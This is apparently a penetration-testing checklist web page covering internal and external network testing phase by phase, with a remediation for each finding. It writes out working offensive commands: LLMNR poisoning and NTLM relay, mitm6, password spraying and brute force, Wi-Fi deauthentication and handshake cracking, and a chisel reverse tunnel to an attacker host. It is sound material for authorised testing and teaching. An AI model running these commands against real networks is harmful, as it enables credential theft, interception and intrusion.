LazyHackers.in — Checklist
📡 Network Pentest Checklist
Internal + external, phase by phase: scenario · command · steps · the finding · the fix
☰ How to use this guide
A network pentest's real value isn't an open-port list — it's how far an attacker moves from one foothold: discovery → credential capture (Responder/relay) → lateral movement → segmentation break → critical asset. This guide turns every checklist line into how-to-test. External engagements prioritise exposed management interfaces, default creds and EOL services; internal engagements live in protocol attacks and segmentation.
AD domain-domination (Kerberoast/DCSync/BloodHound/Golden Ticket) is detailed in the Red Team checklist (§AD) — referenced here, not duplicated. Each section ends with a coverage table.
⚠ Confirm in-scope ranges and exclusions (RoE) before scanning. DoS only if explicitly authorised. Assess impact before testing anything that could destabilise production.
TARGETS=scope.txt # in-scope hosts/ranges (RoE-confirmed)
# Fast sweep then deep scan the live set
nmap -sn -iL $TARGETS -oA hosts # host discovery
nmap -p- --min-rate 2000 -iL live.txt -oA allports
nmap -sCV -p <openports> -iL live.txt -oA services0 Scoping & recon
Confirm scope, then map the perimeter (external) or the network layout (internal).
# External: ASN -> netblocks, DNS, zone transfer attempt
amass intel -asn <ASN> ; dnsrecon -d target.tld -t axfr
dig AXFR target.tld @ns1.target.tld # zone transfer (should fail)
# OSINT exposed hosts
shodan search "org:Target" --fields ip_str,port⚑ Report as: “DNS zone transfer (AXFR) allowed”
🛡 Fix: Confirm and document scope/RoE; restrict zone transfers to authorised secondaries; minimise external exposure; review what OSINT reveals about the estate.
Scoping & recon — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| In-scope ranges/exclusions (RoE) | confirm with client | Scope confirmed |
| External ASN/netblock enumeration | amass intel | External footprint mapped |
| DNS enumeration + AXFR attempt | dnsrecon / dig AXFR | DNS zone transfer allowed |
| Reverse DNS sweep | nmap -sL / dnsx -ptr | Reverse-DNS mapping |
| OSINT via Shodan/Censys | shodan search | Exposed-host disclosure |
| Internal ranges/VLANs noted | document layout | Network layout mapped |
| Testing position identified | note external/LAN/VPN | Test position established |
1 Host discovery
Find live hosts — including those behind firewalls and IPv6 hosts that are often unfiltered.
nmap -sn 10.0.0.0/24 # ICMP/ARP sweep (internal ARP is reliable)
nmap -PS21,22,80,443,445,3389 -sn -iL $TARGETS # TCP ping to firewalled hosts
# IPv6 (often unfiltered on the LAN)
nmap -6 -sn fe80::/64 ; ping6 -c2 ff02::1%eth0⚑ Report as: “Firewalled hosts discoverable / unfiltered IPv6 hosts present”
🛡 Fix: Filter ingress consistently across IPv4 and IPv6; don't rely on hosts being undiscoverable; segment so discovery from one zone doesn't reveal another.
Host discovery — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Live host discovery | nmap -sn (ICMP/ARP) | Host inventory |
| Firewalled-but-responsive hosts | TCP SYN/ACK ping | Firewalled host discovered |
| IPv6 hosts (unfiltered) | nmap -6 / ff02::1 | Unfiltered IPv6 host |
| Broadcast/multicast hosts | multicast probes | Broadcast host discovery |
2 Port scanning & service enumeration
Scan all 65535 TCP ports (not just top-1000), key UDP ports, versions and OS — and note firewall behaviour.
nmap -p- --min-rate 2000 -T4 <host> -oA full
nmap -sU --top-ports 50 <host> # UDP: 53,69,123,161,500,1900,...
nmap -sCV -O -p <open> <host> # version + scripts + OS⚑ Report as: “Unexpected/unauthorised service exposed / management interface reachable”
🛡 Fix: Expose only required services; keep management interfaces (IPMI/iDRAC/iLO, web mgmt) off untrusted networks; review filtered-vs-open to validate firewall rules.
Port scanning & enumeration — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Full TCP scan (all 65535) | nmap -p- | Full port inventory |
| UDP scan key ports | nmap -sU | UDP service exposure |
| Version detection/banners | nmap -sV | Service version inventory |
| OS fingerprinting | nmap -O | OS fingerprint |
| Filtered/open/closed mapped | analyse scan | Firewall behaviour mapped |
| Unexpected services exposed | review services | Unauthorised service exposed |
| Management interfaces exposed | probe IPMI/iLO/web mgmt | Management interface exposed |
3 Vulnerability identification
Identify outdated/EOL services and known-exploitable vulns — and verify, don't trust scanner output.
nmap --script vuln -p <open> <host>
nuclei -l live.txt -t network/ -t http/cves/
# Verify the flagged ones manually (e.g. SMBv1/EternalBlue):
nmap --script smb-vuln-ms17-010 -p445 <host>⚑ Report as: “Outdated/EOL service with known CVE (e.g. SMBv1 / EternalBlue)”
🛡 Fix: Patch/replace EOL services; remove default configs; verify and prioritise exploitable findings over raw scanner output; identify chainable low-sev paths.
Vulnerability identification — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Outdated/EOL services (CVE) | nmap/nuclei + manual | Outdated service |
| Missing patches on exposed services | version check | Missing patch |
| Default configurations | review config | Default configuration |
| Known-exploitable services | targeted nmap scripts | Known-exploitable service |
| Verify (not just scanner) | manual confirmation | Verified vulnerability |
| Chainable low-sev paths | map chains | Exploitation chain identified |
4 Service-specific checks
The bread and butter: per-service misconfigurations. SMB (null sessions, signing, shares), databases (no-auth Redis/Mongo), SNMP community strings, and more.
SMB — null sessions, signing & shares
# Enumerate + check signing + spider shares (NetExec / CrackMapExec)
nxc smb 10.0.0.0/24 --gen-relay-list relay.txt # SMB signing NOT required -> relayable
nxc smb <host> -u '' -p '' --shares # null session + share access
enum4linux-ng -A <host> # users/groups/RID cycling⚑ Report as: “SMB signing not required (NTLM relay) / anonymous share access”
🛡 Fix: Require SMB signing; disable SMBv1; remove null/guest access; lock down share ACLs; remove sensitive data from shares.
Databases & SNMP
redis-cli -h <host> ping # no-auth Redis -> full takeover/RCE via config
mongo --host <host> --eval 'db.adminCommand({listDatabases:1})' # no-auth Mongo
snmpwalk -v2c -c public <host> # default community -> device config/creds⚑ Report as: “No-auth Redis/MongoDB / default SNMP community string”
🛡 Fix: Require auth on all databases and keep them off untrusted networks; encrypt DB traffic; change SNMP community strings, use SNMPv3, make it read-only.
Service-specific — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| SMB: SMBv1 enabled | nmap smb-protocols | SMBv1 enabled |
| SMB: signing not required | nxc --gen-relay-list | SMB signing not enforced |
| SMB: null/anonymous enum | nxc -u '' -p '' | Null-session enumeration |
| SMB: anonymous/guest share | nxc --shares | Anonymous share access |
| SMB: sensitive data on shares | spider shares | Sensitive data on share |
| SMB: writable shares | test write | Writable share |
| SMB: RID cycling enum | enum4linux-ng | User enumeration via RID |
| RDP: exposed externally | nmap -p3389 | RDP exposed |
| RDP: NLA disabled | nmap rdp-ntlm-info | NLA disabled |
| RDP: weak/default creds | careful brute | Weak RDP credentials |
| RDP: BlueKeep/CVE | nmap rdp-vuln | RDP known CVE |
| RDP: weak TLS/cert | testssl on 3389 | Weak RDP TLS |
| SSH: weak/default creds | hydra (low-and-slow) | Weak SSH credentials |
| SSH: password auth where key-only expected | check auth methods | Password auth enabled |
| SSH: weak ciphers/KEX/MAC | ssh-audit | Weak SSH algorithms |
| SSH: outdated OpenSSH | banner/version | Outdated OpenSSH |
| SSH: user enumeration | timing/version probe | SSH user enumeration |
| FTP: anonymous login | ftp anonymous | Anonymous FTP |
| FTP: cleartext creds | capture | Cleartext FTP |
| FTP: writable directory | test upload | Writable FTP directory |
| FTP: outdated daemon | banner | Outdated FTP daemon |
| Telnet exposed (cleartext) | nmap -p23 | Telnet enabled |
| Telnet default device creds | try defaults | Default device credentials |
| SNMP: default community | snmpwalk -c public | Default SNMP community |
| SNMP: v1/v2c (no encryption) | check version | Unencrypted SNMP |
| SNMP: writable community | snmpset test | Writable SNMP community |
| SNMP: config/creds via walk | snmpwalk | Info disclosure via SNMP |
| DNS: zone transfer (AXFR) | dig AXFR | Zone transfer allowed |
| DNS: cache poisoning exposure | review resolver | Cache-poisoning exposure |
| DNS: open resolver | test recursion | Open resolver |
| DNS: dynamic update allowed | nsupdate test | Dynamic update allowed |
| SMTP: open relay | swaks relay test | Open mail relay |
| SMTP: user enum (VRFY/EXPN/RCPT) | smtp-user-enum | SMTP user enumeration |
| SMTP: no TLS / STARTTLS strip | check STARTTLS | Cleartext SMTP |
| SMTP: banner leaks internal info | banner grab | SMTP info disclosure |
| LDAP: anonymous bind | ldapsearch -x | Anonymous LDAP bind |
| LDAP: cleartext (no LDAPS) | check port 389 | Cleartext LDAP |
| LDAP: info disclosure | anonymous query | LDAP info disclosure |
| LDAP: signing/CB not enforced | check policy | LDAP signing not enforced |
| DB: exposed to network | nmap DB ports | Database exposed |
| DB: default/weak/no creds | try defaults | Weak DB credentials |
| Redis no-auth | redis-cli ping | No-auth Redis |
| Mongo/Elastic no-auth | connect | No-auth datastore |
| MSSQL xp_cmdshell/linked-server | mssqlclient.py | MSSQL command execution |
| Unencrypted DB traffic | capture | Unencrypted DB traffic |
| NFS world-readable/writable | showmount -e | Open NFS export |
| rsync no-auth module | rsync list | Open rsync module |
| VNC no/weak auth | nmap vnc | Weak VNC auth |
| Kerberos roastable (88) | see Red Team AD | Roastable account |
| WinRM exposed (5985/5986) | nmap -p5985 | WinRM exposed |
| RPC/135 endpoint mapper disclosure | rpcdump | RPC info disclosure |
| Printers/IoT default creds | try defaults | Default device credentials |
| UPnP/SSDP exposed (1900) | nmap -sU -p1900 | UPnP exposed |
| NTP monlist amplification (123) | ntpq -c monlist | NTP amplification |
| IPMI 2.0 cipher-zero/hash disclosure | nmap ipmi scripts | IPMI weakness |
5 Credentials & brute force
Default creds, weak passwords (targeted, low-and-slow to avoid lockout), spraying, reused breach creds, and creds lying in configs/shares/SNMP.
# Password spray across SMB (one password, many users, avoid lockout)
nxc smb <dc> -u users.txt -p 'Spring2024!' --continue-on-success
# Targeted service brute (low-and-slow)
hydra -L users.txt -P small.txt ssh://<host> -t 4 -W 5⚑ Report as: “Password spraying succeeds / default credentials on service”
🛡 Fix: Strong unique passwords + lockout policy; ban common/breached passwords; MFA where possible; remove cleartext creds from configs/shares; encrypt protocols so creds aren't sniffable.
Credentials & brute force — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Default credentials | try vendor defaults | Default credentials |
| Weak passwords (targeted) | low-and-slow brute | Weak password |
| Password spray | nxc spray | Password spraying |
| Reused breach credentials | replay combos | Reused breached credential |
| Creds in configs/shares/SNMP/banners | grep loot | Credential disclosure |
| No account lockout policy | observe brute behaviour | No lockout policy |
| Cleartext creds sniffable | capture | Sniffable credentials |
6 Network protocol & MITM attacks (internal)
Internal/on-LAN only. The bread-and-butter internal win: poison name resolution to capture hashes, then relay them.
# Capture NetNTLM hashes via LLMNR/NBT-NS/mDNS poisoning
responder -I eth0 -wd
# Relay to a host without SMB signing (after disabling Responder SMB/HTTP)
ntlmrelayx.py -tf relay.txt -smb2support -i
# IPv6 takeover (mitm6 -> DHCPv6 -> relay to LDAP)
mitm6 -d target.local & ntlmrelayx.py -6 -t ldaps://<dc> --delegate-access⚑ Report as: “LLMNR/NBT-NS poisoning yields NetNTLM hashes / NTLM relay (signing not enforced)”
🛡 Fix: Disable LLMNR/NBT-NS/mDNS; require SMB and LDAP signing + channel binding; disable WPAD; segment to limit broadcast domains; disable IPv6 if unused or configure DHCPv6 guard; enable DAI/port security against ARP/STP/DTP abuse.
Protocol & MITM attacks (internal) — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| LLMNR/NBT-NS/mDNS poisoning | responder | Name-resolution poisoning |
| NTLM relay (signing off) | ntlmrelayx | NTLM relay |
| WPAD abuse | responder -w | WPAD abuse |
| ARP spoofing / MITM | ettercap/bettercap | ARP spoofing |
| IPv6 attacks (mitm6) | mitm6 + relay | IPv6 DHCP takeover |
| DHCP starvation / rogue DHCP | dhcpstarv/yersinia | Rogue DHCP |
| STP manipulation | yersinia stp | STP manipulation |
| VLAN hopping | yersinia / frogger | VLAN hopping |
| DNS spoofing on segment | bettercap dns.spoof | DNS spoofing |
| DTP/trunk negotiation abuse | yersinia dtp | Trunk negotiation abuse |
| HSRP/VRRP/GLBP hijack | yersinia hsrp | FHRP hijack |
| Sniffing cleartext protocols | tcpdump/wireshark | Cleartext protocol sniffing |
7 Exploitation
Verify confirmed vulns with controlled PoCs; capture proof; avoid destabilising production.
⚑ Report as: “Verified exploitation of <service> (controlled PoC)”
🛡 Fix: Patch the exploited vuln; restrict access to the service; for appliances apply vendor fixes and remove management exposure.
Exploitation — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Verified exploitation | controlled PoC | Confirmed exploitation |
| RCE on exposed vulnerable service | targeted exploit | Remote code execution |
| Auth bypass on appliance/mgmt | test bypass | Management auth bypass |
| DoS (only if in RoE) | authorised test | Denial of service |
| Capture proof | screenshot/output | Evidence captured |
| Avoid destabilising prod | impact-assess first | Impact assessed |
8 Post-exploitation & pivoting
From a foothold: escalate, harvest creds, discover the internal network, and pivot — the part that proves real blast radius. Privesc/cred-harvest/lateral detail lives in the Red Team checklist.
# Pivot a SOCKS proxy through the foothold, then scan deeper segments
# (e.g. via an SSH tunnel or C2). Example with chisel:
chisel server -p 8000 --reverse # attacker
chisel client <atk>:8000 R:socks # foothold
proxychains nmap -sT -Pn <deeper-subnet>⚑ Report as: “Segmentation weakness — foothold reaches a restricted segment”
🛡 Fix: Segment networks so a single foothold can't reach sensitive zones; restrict lateral SMB/WinRM/RDP; monitor east-west traffic; least-privilege local accounts to limit cred-harvest value.
Post-exploitation & pivoting — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Local privilege escalation | see Red Team §6 | Local privilege escalation |
| Credential harvest from host | see Red Team §8 | Credential harvest |
| Internal network discovery | enum from foothold | Internal discovery |
| Pivot/proxy into deeper segments | SOCKS/port-forward | Network pivot |
| Reach previously-unreachable segments | test segmentation | Segmentation break |
| Lateral movement (PtH/PtT/PsExec) | see Red Team §10 | Lateral movement |
| Document reachable blast radius | map reach | Blast radius documented |
9 Network devices / infrastructure
Routers, switches, firewalls and load balancers: exposed management, default creds, cleartext mgmt protocols and outdated firmware.
⚑ Report as: “Network device management exposed with default credentials”
🛡 Fix: Segment the management plane; change default creds; disable Telnet/HTTP mgmt (use SSH/HTTPS); SNMPv3 only; patch firmware; tighten overly permissive (any-any) firewall rules; enable routing-protocol authentication.
Network devices / infrastructure — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Router/switch/firewall mgmt exposed | probe mgmt | Management plane exposed |
| Default device credentials | try defaults | Default credentials |
| Telnet/HTTP mgmt (cleartext) | check protocols | Cleartext management |
| SNMP default community on devices | snmpwalk | Default SNMP community |
| Outdated firmware (CVE) | version check | Outdated firmware |
| Weak SSH/TLS on mgmt | ssh-audit/testssl | Weak management crypto |
| Config disclosure (TFTP/SNMP/backup) | fetch config | Config disclosure |
| Overly permissive ruleset (any-any) | review rules | Permissive firewall rule |
| No mgmt-plane segmentation | review topology | Flat management plane |
| Routing protocol auth missing | review OSPF/BGP/EIGRP | Routing auth missing |
| LB/VPN concentrator known CVE | version check | Edge device CVE |
10 Wireless
If in scope: weak encryption, handshake capture/cracking, WPS, evil twin, enterprise EAP, and guest/corp isolation.
airmon-ng start wlan0 ; airodump-ng wlan0mon # survey
airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon # capture WPA2 handshake
aireplay-ng -0 5 -a <AP> -c <client> wlan0mon # deauth to force handshake
hashcat -m 22000 cap.hc22000 rockyou.txt # offline crack⚑ Report as: “Weak WPA2-PSK passphrase cracked from captured handshake”
🛡 Fix: Strong WPA2/WPA3 passphrases or 802.1X with proper cert validation; disable WPS; enable management-frame protection (802.11w); isolate guest from corporate; detect rogue APs.
Wireless — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Open/WEP/weak WPA2-PSK | airodump survey | Weak wireless encryption |
| WPA2 handshake → offline crack | capture + hashcat | Crackable WPA2 passphrase |
| WPA3 downgrade/Dragonblood | downgrade test | WPA3 downgrade |
| WPS PIN brute force | reaver/bully | WPS PIN brute force |
| Evil twin / rogue AP | hostapd-wpe | Evil-twin credential capture |
| Enterprise EAP relay / cert bypass | eaphammer | EAP credential relay |
| Guest↔corporate isolation broken | test reach from guest | Guest-network isolation break |
| PSK reuse / weak passphrase | crack & compare | Weak/reused PSK |
| Management-frame protection missing | deauth test | No 802.11w |
| Hidden SSID / rogue device discovery | survey | Rogue device |
11 Segmentation & egress testing
Prove (or break) zone isolation: can user reach server/management/PCI/OT zones, and can data leave (egress)?
# From each zone, test reachability to others + egress
nmap -Pn -p 22,445,3389,1433 <other-zone-host>
# Egress: can arbitrary ports leave?
for p in 53 80 443 4444 8080; do nc -zvw2 <external-ip> $p; done⚑ Report as: “Network segmentation failure (user zone reaches server/PCI zone) / no egress filtering”
🛡 Fix: Enforce least-privilege segmentation between user/server/DMZ/PCI/OT zones; default-deny egress with an allowlist; block covert tunneling channels; isolate guest networks from internal resources.
Segmentation & egress — full coverage
| Checklist item | How to test | Report as |
|---|---|---|
| Flat network (no segmentation) | cross-zone reachability | No segmentation |
| DMZ → internal reachable | probe internal from DMZ | DMZ-to-internal access |
| User VLAN → server/mgmt VLAN | probe from user VLAN | Cross-VLAN access |
| PCI/sensitive zone not isolated | probe PCI zone | PCI isolation failure |
| OT/ICS reachable from IT | probe OT (carefully) | IT-to-OT reachability |
| Egress filtering absent | test outbound ports | No egress filtering |
| DNS/ICMP/HTTPS tunneling possible | iodine/dnscat2 test | Covert tunneling possible |
| Guest reaches internal | probe from guest | Guest-to-internal access |
✓ Coverage map & how to run it
Match the work to the engagement type: external focuses on the perimeter, internal on protocol attacks + lateral + segmentation.
| Engagement type | Sections | Focus |
|---|---|---|
| External | §0–5, §9 | Perimeter exposure, exposed services, edge devices, default creds, EOL |
| Internal | §4–8, §6, §11 | Service misconfig, Responder/relay, lateral, segmentation |
| Wireless | §10 + segmentation | Encryption, handshake crack, evil twin, isolation |
| Segmentation audit | §11 | Prove zone isolation (or break it) |
| Device/infra review | §9 | Config, firmware, management plane |
Core principle: the story is discovery → credential capture (Responder/relay) → lateral movement → segmentation break → critical asset — not a flat list of open ports and CVEs. Tie every finding to blast radius and segmentation impact, and reference the Red Team checklist for the AD domain-domination chain. Tick a box only when you've actually run the test.